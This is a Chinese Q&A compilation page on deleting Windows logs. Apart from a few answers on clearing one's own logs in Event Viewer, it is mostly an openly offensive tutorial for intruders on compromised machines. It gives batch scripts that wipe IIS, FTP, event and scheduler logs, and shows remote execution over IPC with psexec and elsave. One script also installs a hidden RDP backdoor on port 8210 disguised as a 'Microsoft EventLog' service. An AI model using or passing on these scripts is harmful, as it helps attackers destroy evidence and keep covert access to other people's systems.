本文目录一览：

• 1、pe下怎么样清除系统日志
• 2、一般所谓的黑客在入侵完电脑后都要删除日志，是哪个日志，怎么打开查看？
• 3、黑客怎么清除肉鸡电脑的日志？
• 4、怎样删除XP系统中的所有日志文件？？？
• 5、开机日志怎么删？
• 6、关于日志文件的清除。

pe下怎么样清除系统日志

　1."控制面板"中进入"管理工具"，再双击里面的"事件查看器"。然后选择打开我们需要清除的日志文件，比如用户想清除安全日志，可以右键点击"安全性"选项，在弹出的菜单中选择"属性"命令。接下来在弹出的对话框中，点击下面"清除日志"按钮就可以清除了。

2.如果用户想要清除自己系统中的日志文件，首先需要用管理员账号登录Windows系统，接着在"控制面板"中进入"管理工具"，再双击里面的"事件查看器"。然后选择打开我们需要清除的日志文件，比如用户想清除安全日志，可以右键点击"安全性"选项，在弹出的菜单中选择"属性"命令。接下来在弹出的对话框中，点击下面"清除日志"按钮就可以清除了。

刚刚介绍了对于本地的日志文件的清除，但是如果是一名黑客，入侵系统成功后第一件事便是清除日志。黑客会使用两个办法来清除远程计算机上的日志文件。其中一是自己编写批处理文件来解决，编写一个能清除日志的批处理非常简单：

@del c:\winnt\system32\logfiles\*.*

@del c:\winnt\system32\config\*.evt

@del c:\winnt\system32\dtclog\*.*

@del c:\winnt\system32\*.log

@del c:\winnt\system32\*.txt

@del c:\winnt*.txt

@del c:\winnt*.log

@del c:\dellog.bat

把上面的内容保存为dellog.bat备用。接着通过IPC共享连接到远程计算机上，将这个批处理文件上传到远程计算机系统并执行，即可清除肉鸡上的日志文件。

另外，清除日志文件还可以借助第三方软件，比如小榕的elsave.exe就是一款可以清除远程以及本地系统中系统日志、应用程序日志、安全日志的软件。elsave.exe使用起来很简单，首先还是利用管理员账号建立IPC连接，接着在命令行下执行清除命令，这样就可以删除这些系统中的网络日志文件。

如果用PE的话，清除如下目录即可：

c:\winnt\system32\logfiles\*.*

c:\winnt\system32\config\*.evt

c:\winnt\system32\dtclog\*.*

c:\winnt\system32\*.log

c:\winnt\system32\*.txt

c:\winnt*.txt

c:\winnt*.log

c:\dellog.bat

一般所谓的黑客在入侵完电脑后都要删除日志，是哪个日志，怎么打开查看？

1) Scheduler日志

Scheduler服务日志默认位置：2000下: %sys temroot%\schedlgu.txt NTworkstation下为 SchedLog.txt

可以打开schedlgu.txt

Schedluler服务日志在注册表中

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent

先停掉他 net stop "task scheduler" (注意不停是删不掉的)

然后再 del schedlgu.txt 或 schedlog.txt之后就OK了.

del sched*.txt

不过你如果不想删他,也可以改改它. 他的内容是这样的:

" "任务计划程序服务"

已退出于 01-5-22 20:37:34

"任务计划程序服务"

已启动于 01-5-25 7:07:37

"任务计划程序服务"

已启动于 01-5-25 7:26:36

"任务计划程序服务"

已退出于 01-5-25 8:47:54 "

很好改的.

(2) FTP日志

Internet信息服务FTP日志默认位置：%sys temroot%\sys tem32\logfiles\msftpsvc1\，默认每天一个日志.

格式是这样的 ex*.log .

注意这是一台NT4的LOGFILES下的文件:

这台服务器下管理有多个HTTP或FTP站点

c:\winnt\sys tem32\logfiles 的目录

00-12-04 06:28p .

00-12-04 06:28p ..

01-05-18 12:56p MSFTPSVC1

01-04-23 11:28a MSFTPSVC2

01-01-12 11:56a MSFTPSVC3

01-06-01 08:12a SMTPSVC1

01-09-20 08:55a W3SVC1

01-08-02 10:36a W3SVC10

01-10-11 04:48p W3SVC11

01-07-11 09:16a W3SVC2

01-10-11 10:31a W3SVC3

01-10-10 04:55p W3SVC4

01-09-28 01:43p W3SVC5

01-10-11 08:44a W3SVC6

01-10-11 08:00a W3SVC7

01-09-30 01:49p W3SVC8

01-10-11 08:03a W3SVC9

看看日志文件的格式:

c:\winnt\sys tem32\logfiles\msftpsvc1\in010306.log

192.168.5.8, anonymous, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0,

0, 0, 331, 0, [3]USER, anonymous, -,

192.168.5.8, -, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0, 0, 0, 53

0, 1326, [3]PASS, IE30User@, -,

关于LOG文件的含意我就不解释了,浪费时间,嘿嘿.

法一: 这个时侯 net stop msftpsvc 停掉后台服务.

然后尽管 del 看这删吧,不要删的过火,把当天的删了就行. 别忘了再NET START MSFTPSVC 把服务打开.

法二: 当然你如果还想更好,那就改改日志,可以改了系统时间后再改日志,只把你的清了,别忘了把时间改回来哦

实际上在得到ADMIN权限后,做这些事很容易.

法三:) 最傻瓜的清FTP日志的方法, cleaniislog 小蓉写的工具,不用我再教了吧!

(3) WWW日志

Internet信息服务WWW日志默认位置：%sys temroot%\sys tem32\logfiles\w3svc1\，默认每天一个日志

注意这是一台NT4的LOGFILES下的文件:

这台服务器下管理有多个HTTP或FTP站点

c:\winnt\sys tem32\logfiles 的目录

00-12-04 06:28p .

00-12-04 06:28p ..

01-05-18 12:56p MSFTPSVC1

01-04-23 11:28a MSFTPSVC2

01-01-12 11:56a MSFTPSVC3

01-06-01 08:12a SMTPSVC1

01-09-20 08:55a W3SVC1

01-08-02 10:36a W3SVC10

01-10-11 04:48p W3SVC11

01-07-11 09:16a W3SVC2

01-10-11 10:31a W3SVC3

01-10-10 04:55p W3SVC4

01-09-28 01:43p W3SVC5

01-10-11 08:44a W3SVC6

01-10-11 08:00a W3SVC7

01-09-30 01:49p W3SVC8

01-10-11 08:03a W3SVC9

w3svc1 下的文件:

黑客怎么清除肉鸡电脑的日志？

迩好，我本来就是一黑客游民，很高兴为你服务，这个问题，迩先断网，然后脱机工作 ，下载360或者瑞星，把小虾（菜鸟黑客）下载在迩电脑上的软件删除程序，就可以了。回答完毕，记得给分。

怎样删除XP系统中的所有日志文件？？？

删除日志文件一般是黑客们惯用的打扫现场的做法~~这样别人就没办法知道他在这个电脑上都做了什么。一般的手动删除是没办法实现的，因为你毕竟是在连接对方PC的情况先删除的 最后还会留下你的一些信息，最好的办法就是写一个批处理文件 然后把这个文件放进对方电脑的“启动文件”里面 然后远程重新启动对方电脑，当对方电脑自动重新启动的时候就会自动运行这个批处理 这样对方电脑里面就不会残留你的任何信息！

你可以下载下面的这个程序自动完成

或者使用下面批处理命令 把下面文字复制到一个文本里面 然后重新命名文本格式为批处理格式双吉运行即可

下面命令是清除肉鸡所有日志，禁止一些危险的服务，并修改肉鸡的terminnal service留跳后路。

@regedit /s patch.dll

@net stop w3svc

@net stop event log

@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q

@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q

@del c:\winnt\system32\config\*.event /f /q

@del c:\winnt\system32dtclog\*.* /f /q

@del c:\winnt\*.txt /f /q

@del c:\winnt\*.log /f /q

@net start w3svc

@net start event log

@rem [删除日志]

@net stop lanmanserver /y

@net stop Schedule /y

@net stop RemoteRegistry /y

@del patch.dll

@echo The server has been patched,Have fun.

@del patch.bat

@REM [禁止一些危险的服务。]

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] patch.dll

@echo "PortNumber"=dword:00002010 patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp patch.dll

@echo "PortNumber"=dword:00002012 patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] patch.dll

@echo "Start"=dword:00000002 patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] patch.dll

@echo "Start"=dword:00000002 patch.dll

@echo "ErrorControl"=dword:00000001 patch.dll

@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ patch.dll

@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ patch.dll

@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 patch.dll

@echo "ObjectName"="LocalSystem" patch.dll

@echo "Type"=dword:00000010 patch.dll

@echo "Description"="Keep record of the program and windows message。" patch.dll

@echo "DisplayName"="Microsoft EventLog" patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] patch.dll

@echo "Start"=dword:00000004 patch.dll

@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe

@REM [修改3389连接，端口为8210(十六进制为00002012)，名称为Microsoft EventLog，留条后路]

开机日志怎么删？

方法如下：

打开“我的电脑”，

C盘Windows目录下找到一个SchedLgU．txt。

它是“计划任务”的日志，会忠实地记录电脑计划任务的执行情况，还有每次开机启动Windows系统的信息。

双击打开SchedLgU．txt文件，并清除里面的内容，然后点击“文件”菜单－－保存－－关闭即可

当然，如果要删除一条，就在文本里面找对应时间的项目。

关于日志文件的清除。

说实话我不太懂,帮你 找到这篇文章,你研究一下好了:

什么是日志文件？它是一些文件系统集合，依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时，数据就遵从日志文件中的信息记录原封不动进行恢复。日志对于系统安全的作用是显而易见的，无论是网络管理员还是 黑客都非常重视日志，一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能，而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。无论是攻还是防，日志的重要性由此可见。下面我们就来简单讨论一下日志文件的清除方法。

一、日志文件的位置

Windows 2000的系统日志文件有应用程序日志，安全日志、系统日志、DNS服务器日志等等，应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%system32config。

安全日志文件：%systemroot%system32configSecEvent.EVT

系统日志文件：%systemroot%system32configSysEvent.EVT

应用程序日志文件：%systemroot%system32configAppEvent.EVT

有的管理员很可能将这些日志重定位（所以日志可能不在上面那些位置），其中EVENTLOG下面有很多的子表，在里面可查到以上日志的定位目录。

二、清除自己电脑中的日志

如果你要清除自己电脑中的日志，可以用管理员的身份来登录Windows，然后在“控制面板”中进入“管理工具”，再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了，里面有应用程序、安全和系统日志文件。举个例子，比方说你想清除安全日志，可以右键点击“安全日志”，在弹出的菜单中选择“属性”。接下来在弹出的对话框中，点击下面“清除日志”按钮就可以清除了，如果你想以后再来清除这些日志的话，可以将“按需要改写尺寸”，这样就可以在达到最大日志尺寸时进行改写事件了，不会提示你清除日志。

三、清除远程主机上的日志

大多数情况下，IIS的日志会忠实地记录它接收到的任何请求（也有特殊的不被IIS记录的攻击），一个优秀的系统管理员会利用这点来发现入侵的企图，保护自己的系统。所以如果你是黑客，入侵系统成功后第一件事便是清除日志，擦去自己的形迹，这时可以用以下两个办法：一是自己编写批处理文件来解决，编写一个能清除日志的批处理非常简单，方法是：新建一个具有如下内容的批处理文件：

@del c:winntsystem32logfiles*.*

@del c:winntsystem32config*.evt

@del c:winntsystem32dtclog*.*

@del c:winntsystem32*.log

@del c:winntsystem32*.txt

@del c:winnt*.txt

@del c:winnt*.log

@del c:del.bat

把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令，在它的前面加上“@”前缀字符，表示执行时本行在命令行或DOS里面不显示，另外del命令大家一定清楚吧？它是删除文件命令。

接下来再新建一个批处理文件，内容如下：

@copy del.bat ＼%1c$

@echo 向肉鸡复制本机的del.bat……OK

@psexec ＼%1 c:del.bat

@echo 在肉鸡上运行del.bat，清除日志文件……OK

保存为clean.bat即可，假设已经与肉鸡进行了Ipc连接，然后在CMD下输入：clean.bat 肉鸡IP，即可清除肉鸡上的日志文件。

清除日志的另外一个方法是借助第三方软件，如著名黑客软件流光的开发者黑客小榕的elsave.exe，就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件，大家可以在网上下载到。elsave.exe使用起来很简单，首先利用获得的管理员账号与对方建立IPC会话：net use ＼ip pass /user: user，然后在命令行下执行如下命令：elsave -s ＼ip -l application -C，这样就删除了安全日志。